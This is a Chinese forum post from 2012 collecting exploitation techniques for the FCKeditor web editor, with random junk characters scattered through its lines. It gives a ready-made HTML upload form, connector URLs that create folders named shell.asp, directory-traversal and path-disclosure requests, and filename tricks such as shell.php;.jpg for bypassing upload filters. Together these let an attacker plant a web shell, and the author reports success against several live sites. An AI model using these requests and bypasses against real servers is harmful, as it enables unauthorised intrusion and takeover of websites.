Fckeditor漏洞利用总结
2 S3 A& J ]3 L9 J# B- N% T5 c查看编辑器版本8 f1 M. V5 O. R
FCKeditor/_whatsnew.html) T& _4 k# c, V5 G$ g/ c
—————————————————————————————————————————————————————————————
5 B3 U& B7 H! Y/ n
4 A2 |3 O! C/ u' l2. Version 2.2 版本; w5 B) H9 F) T8 P
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
( g, k& f% T+ G—————————————————————————————————————————————————————————————9 {, D9 x2 d) |) j
2 b C8 p2 w2 k/ X8 f, g
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
/ A* l3 O! l9 t' r5 L" H<form id="frmUpload" enctype="multipart/form-data"
, O# \' o: X* X1 l2 Gaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 U: Q, l' D$ u' c9 T<input type="file" name="NewFile" size="50"><br>
" [& X5 E7 C3 J3 ?( \7 y, g<input id="btnUpload" type="submit" value="Upload">
! B1 s. p6 {9 I/ |</form>
" d0 e! o/ m% t# X0 `1 C4 p5 y—————————————————————————————————————————————————————————————0 R% z8 H" r: e! U
+ f7 B( r5 p V v* s
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
( S b' `8 ~& x0 A6 {: \ V% E; u6 F 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。- x# n; O! z( _9 |: W* |3 a
4.1:提交shell.php+空格绕过
' W0 R2 A# R; L不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。$ |6 p) U7 S- p- { s
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
; G- l+ N( l% F) b' |: Z7 H3 H) Z—————————————————————————————————————————————————————————————0 n2 B+ h- E3 W" J3 f
% T5 M, W- }* _ {) ~& D* O, T5. 突破建立文件夹
3 |, W; d% c J, L2 z b( \# gFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756843 L/ t/ R! r1 M1 }
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp. J6 r, x5 O" ^* Q- q( n
—————————————————————————————————————————————————————————————; y* S5 K) p {8 o3 s4 Q$ O
9 V3 j* B8 h) L" ]6. FCKeditor 中test 文件的上传地址- r4 |+ _( n4 D( Y
FCKeditor/editor/filemanager/browser/default/connectors/test.html
) T! c; N: g+ x4 X7 [! J% KFCKeditor/editor/filemanager/upload/test.html* |% j7 \6 M* g+ z
FCKeditor/editor/filemanager/connectors/test.html7 S& f) ?- L, G3 z0 ]6 c
FCKeditor/editor/filemanager/connectors/uploadtest.html' S. R0 i$ H8 q# @* |2 o
—————————————————————————————————————————————————————————————
$ B s3 R8 n9 v, o, _; Q5 U/ y5 e1 v0 |
7.常用上传地址, n/ I- q' s4 k0 s! S% ~* v! G* M
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/4 E t: f: m. v4 g+ V$ |5 L: r
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
1 a7 D( y! u: s) |$ zFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)5 P7 n# `* _" H
JSP 版:7 ~$ w# p+ ?4 U, Q" |1 m
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
8 x5 H/ \9 i5 V6 s e- X2 G注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文4 k' G9 P% [6 h6 I
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。" }7 x! N0 X E9 k6 \! s* w
—————————————————————————————————————————————————————————————& E# Z# K0 w( A( f3 J6 H/ M
1 {5 A ^) n' P2 W
8.其他上传地址; m; B S; g: H" [ Y1 s- h3 o
FCKeditor/_samples/default.html5 }: o2 g8 O2 @, G. j7 w
FCKeditor/_samples/asp/sample01.asp6 F7 @: a( s# j& Z( s
FCKeditor/_samples/asp/sample02.asp
% Y7 q" M( h& fFCKeditor/_samples/asp/sample03.asp* b2 p/ A4 |% v$ M" o
FCKeditor/_samples/asp/sample04.asp& E- u- b3 l p" M( a2 O1 I
一般很多站点都已删除_samples 目录,可以试试。: `# _4 O5 `4 \% J6 y+ W8 s( n" X! g
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
8 Q0 E3 U* \) H$ y—————————————————————————————————————————————————————————————
4 \5 u* S8 B( V4 _3 x' S+ z& f
9.列目录漏洞也可助找上传地址9 F. I3 N! b1 i; Z) K3 \) u6 K
Version 2.4.1 测试通过
! y0 [. s/ J; Q* r# T/ L修改CurrentFolder 参数使用 ../../来进入不同的目录
0 d b* x9 C5 _0 Z/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
3 {+ P. q) _ M3 c根据返回的XML 信息可以查看网站所有的目录。, B+ \8 l! h+ I8 Y& I
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
% b; `( H3 n. x" z8 g1 P也可以直接浏览盘符:
2 ^! y* F+ ^, `( XJSP 版本:
$ ^9 Y" b8 A& P; c- g1 dFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
! A5 p! O/ _) K, ?3 D—————————————————————————————————————————————————————————————8 G) \" y2 B6 g, j/ w
; M. H" }! g5 ]7 ^: t/ W! X5 Q% W
10.爆路径漏洞0 X# ~3 g8 l% B' c6 b
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp+ N& X5 ?" V" ^. L$ h( Q
—————————————————————————————————————————————————————————————
; n* M6 r. s; N F: n+ l( P% [: Z- q* ^$ v+ I4 A
11. FCKeditor 被动限制策略所导致的过滤不严问题
9 ?! f, c- a% u$ L5 c8 q* G 影响版本: FCKeditor x.x <= FCKeditor v2.4.3" Y T$ x7 ^' i
脆弱描述:0 Y# [2 d; q2 S5 P7 n% e2 a& W& W" e% O
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:( l5 N! z( H. o, x# t d1 H& H9 l
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
/ A9 |. v S6 n: RFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!- N }* l" X# ~* l8 T, e" r+ {! }
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。: O3 a: g4 J3 d! z
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! B& b+ F$ h! G) J" F8 I* J8 U
—————————————————————————————————————————————————————————————. o. a4 g' l% |/ y5 O5 \ M
' @7 G3 C8 [( [2 p
12.最古老的漏洞,Type文件没有限制!' x( p! T5 e% F* k% B7 H
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! # L9 x2 ^+ o. |2 ]9 d
—————————————————————————————————————————————————————————————
; q! Q8 ?# o9 U1 h6 j6 ~$ C6 I) L. T
' a7 ~) s; ?# ?. T: l9 O===============================================================================================================================================
1 r( K% {2 j$ ]* u
O+ m% H' V) \( Q) P( mFCK编辑器jsp版本漏洞:
8 j) Z l. P# s/ H( H' j i' x
9 M. V& N1 |& e# ]
* E5 ?9 @, c$ K3 ohttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
$ f! d$ \/ L# n3 j9 `
- Z3 h% L! b' b- s" d$ Y5 A a! w上传马所在目录* l9 q- I& E5 G2 @ k- b" @
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/! A+ [/ {* J, o! w- u
上传shell的地址:
/ H9 x& X H, D2 u1 H, {. ]4 n n' r9 Fhttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector3 o- z7 J' p- R9 t# O8 b! c5 i
跟版本有关系.并不是百分百成功. 测试成功几个站.
3 B' J; t6 X: M+ s3 t" L/ E不能通杀.很遗憾.
7 J1 ?1 {, O6 W. Y4 m, Thttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector4 X4 @% J9 |, S
如果以上地址不行可以试试 D8 C' t* x. M8 O& @! ]7 h# @7 H
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
+ D5 X+ v. x( j' X0 ~! i h2 |# QFCKeditor/_samples/' s" T$ i5 C% B5 ]
FCKeditor/_samples/default.html S7 O# d7 p" K6 B6 B2 |
FCKeditor/editor/fckeditor.htm
1 \: M- x% _2 A7 ?' mFCKeditor/editor/fckdialog.html/ }' B: Z3 X; A _* K. U
" W1 k& P0 u4 \$ k% `* _; z
7 y3 O5 S$ h" d) ^. _. K4 I5 ?' F8 S( w9 W8 m, U' H8 E
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg* S' v8 }2 ]6 x2 b
|
发表于 2012-9-13 17:01:39
收藏
支持
反对